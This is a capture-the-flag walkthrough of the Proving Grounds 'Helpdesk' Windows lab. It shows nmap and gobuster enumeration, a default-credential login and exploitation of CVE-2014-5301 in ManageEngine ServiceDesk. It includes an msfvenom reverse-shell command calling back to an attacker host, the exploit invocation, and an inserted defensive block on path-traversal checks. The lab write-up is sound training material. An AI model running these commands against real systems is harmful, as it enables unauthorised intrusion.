PG - Helpdesk


In this walkthrough, we will be going through the Helpdesk room from Proving Grounds. This room is rated Easy on the platform and consists of exploiting CVE-2014-5301 in ManageEngine ServiceDesk to get root on the target. So, let’s get started without any delay.

Helpdesk

Machine Info:

Title: Helpdesk
IP address: 192.168.163.43
Difficulty: Easy
OS: Windows
Description: Helpdesk is an Easy rated Windows machine which requires exploitation of CVE-2014-5301 in ManageEngine ServiceDesk to get root on the target.

Enumeration:

  • I started off with a regular aggressive nmap scan and found 5 open ports – 135 (RPC), 139 and 445 (SMB), 3389 (RDP) and 8080 (HTTP).

$ sudo nmap -A 192.168.163.43
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-09 00:05 IST

Nmap scan report for 192.168.163.43
Host is up (0.20s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open  ms-wbt-server Microsoft Terminal Service
8080/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
|_http-server-header: Apache-Coyote/1.1
|_http-title: ManageEngine ServiceDesk Plus
| vulners: 
|   cpe:/a:apache:coyote_http_connector:1.1: 
|     	PRION:CVE-2023-26044	5.0	https://vulners.com/prion/PRION:CVE-2023-26044
|     	PRION:CVE-2022-36032	5.0	https://vulners.com/prion/PRION:CVE-2022-36032
|     	OSV:CVE-2023-26044	5.0	https://vulners.com/osv/OSV:CVE-2023-26044
|     	OSV:CVE-2022-36032	5.0	https://vulners.com/osv/OSV:CVE-2022-36032
|_    	OSV:BIT-APACHE-2021-31618	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2021-31618
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenBSD 4.0 (92%), Apple AirPort Extreme WAP (92%), FreeBSD 6.2-RELEASE (92%), OpenBSD 4.3 (92%), Cisco ACE load balancer (87%), Microsoft Windows Server 2008 R2 SP1 (87%), Microsoft Windows Server 2008 (87%), Microsoft Windows Server 2008 R2 (87%), Microsoft Windows Server 2008 R2 or Windows 8 (87%), Microsoft Windows 7 SP1 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: HELPDESK; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2

Host script results:
|_clock-skew: mean: 2h40m00s, deviation: 4h37m08s, median: 0s
|_nbstat: NetBIOS name: HELPDESK, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ba:09:2c (VMware)
| smb-os-discovery: 
|   OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: HELPDESK
|   NetBIOS computer name: HELPDESK\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-02-08T10:35:48-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-02-08T18:35:48
|_  start_date: 2024-02-08T18:33:38

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   200.35 ms 192.168.45.1
2   200.34 ms 192.168.45.254
3   201.15 ms 192.168.251.1
4   201.60 ms 192.168.163.43

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.36 seconds

nmap scan

Host script results

  • Enumerated SMB shares using an smbclient null session but found nothing.

smbclient -L 192.168.163.43

SMB Enumeration

Port 8080

  • Next, the web server running on port 8080. It reveals a login panel for the “ManageEngine ServiceDesk Plus” application.

ManageEngine ServiceDesk login panel

  • Fired gobuster at the target in the background to reveal hidden directories. Found a bunch of directories, as per the result.

$ gobuster dir -u http://192.168.163.43:8080/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt

gobuster scan

  • Used the application’s default credentials to log into the backend.

ManageEngine ServiceDesk backend

  • Once inside, enumerated the application version running – 7.6.0.

ManageEngine ServiceDesk Version

Exploitation & Getting root:

CVE-2014-5301

  • Looked online for known exploits of this version and found that it is vulnerable to CVE-2014-5301. As per my findings, there is a directory traversal vulnerability in ManageEngine ServiceDesk, AssetExplorer, SupportCenter and IT360 when uploading attachment files: the JSP that accepts the upload does not correctly handle ‘../’ sequences, which can be abused to write to the file system.

CVE-2014-5301
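To make the flaw described above concrete from the defender's side, here is an added example (not code from the write-up, from the exploit script, or from ManageEngine). It shows an upload path join that trusts the client-supplied filename beside a hardened version that rejects directory components and verifies containment, plus a small detection helper run over constructed upload log lines. The attachment directory, the log line format and all filenames are assumptions made for the illustration.

```python
"""Added example, not code from the write-up, the exploit script, or ManageEngine:
the '../' handling flaw described for CVE-2014-5301, shown as an upload path
join without a containment check beside a hardened version, plus a small
detection helper over constructed upload log lines. All paths and log lines
here are constructed for illustration."""
import posixpath
import re

# Constructed attachment store path; the real product's directory layout is not
# taken from the write-up.
ATTACHMENT_ROOT = "/opt/app/attachments"


def vulnerable_save_path(upload_root: str, filename: str) -> str:
    """'Before' behaviour: the client-supplied name is joined as-is, so a name
    containing '../' resolves to a location outside the upload root."""
    return posixpath.normpath(posixpath.join(upload_root, filename))


def safe_save_path(upload_root: str, filename: str) -> str:
    """Hardened version: reject any name that carries directory components, then
    verify (defence in depth) that the resolved path still lies under the root."""
    if filename in ("", ".", "..") or "/" in filename or "\\" in filename:
        raise ValueError("attachment name must not contain path components")
    root = posixpath.normpath(upload_root)
    candidate = posixpath.normpath(posixpath.join(root, filename))
    # commonpath() returns the shared prefix; anything other than the root
    # itself means the candidate escaped it.
    if posixpath.commonpath([root, candidate]) != root:
        raise ValueError("attachment path escapes the upload root")
    return candidate


# Constructed upload log lines in an assumed 'filename="..."' format.
SAMPLE_UPLOAD_LOG = [
    'POST /upload filename="invoice.pdf" user=alice',
    'POST /upload filename="../../escaped.txt" user=bob',
    'POST /upload filename="..\\..\\escaped.txt" user=bob',
    'POST /upload filename="report.docx" user=carol',
]

_FILENAME_RE = re.compile(r'filename="([^"]*)"')


def flag_traversal_uploads(log_lines):
    """Detection helper: return the attachment names in the given log lines that
    contain a traversal sequence or a path separator."""
    flagged = []
    for line in log_lines:
        match = _FILENAME_RE.search(line)
        if not match:
            continue
        name = match.group(1)
        if ".." in name or "/" in name or "\\" in name:
            flagged.append(name)
    return flagged


if __name__ == "__main__":
    print("vulnerable:", vulnerable_save_path(ATTACHMENT_ROOT, "../../escaped.txt"))
    print("safe:", safe_save_path(ATTACHMENT_ROOT, "invoice.pdf"))
    try:
        safe_save_path(ATTACHMENT_ROOT, "../../escaped.txt")
    except ValueError as exc:
        print("rejected:", exc)
    print("flagged:", flag_traversal_uploads(SAMPLE_UPLOAD_LOG))
```

The hardened function rejects rather than silently strips, so a rejected upload shows up as an error the application can log; the containment check on the normalised path is kept as a second line of defence in case the name filter is ever loosened.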

  • Created a shell.war file with msfvenom as required by the exploit.

msfvenom -p java/shell_reverse_tcp LHOST=192.168.45.238 LPORT=445 -f war > shell.war

creating shell.war file with msfvenom

  • Next, used the below exploit code to trigger the vulnerable component on the target host. The script requires the target host, target port, valid credentials and a shell.war file, which will be our payload.

Exploit: https://github.com/PeterSufliarsky/exploits/blob/master/CVE-2014-5301.py

sudo python3 exploit.py 192.168.163.43 8080 administrator administrator shell.war

firing the exploit

  • Once the execution is completed, we receive a connection back at our netcat listener. Finally, captured the root flag and completed the machine.

got root

proof flag


Conclusion:


So that was “Helpdesk” for you. We started off with a regular nmap scan and found 5 open ports – 135 (RPC), 139 and 445 (SMB), 3389 (RDP) and 8080 (HTTP). Enumerated the web server on port 8080 and found a ManageEngine ServiceDesk installation. Logged in using the default credentials and got access to the backend, which reveals the running version, 7.6.0. Looked online for any known exploit and found that it is vulnerable to CVE-2014-5301. Used that exploit and got root on the target. On that note, I would take your leave and will meet you in the next one. Till then, “Happy hacking”.
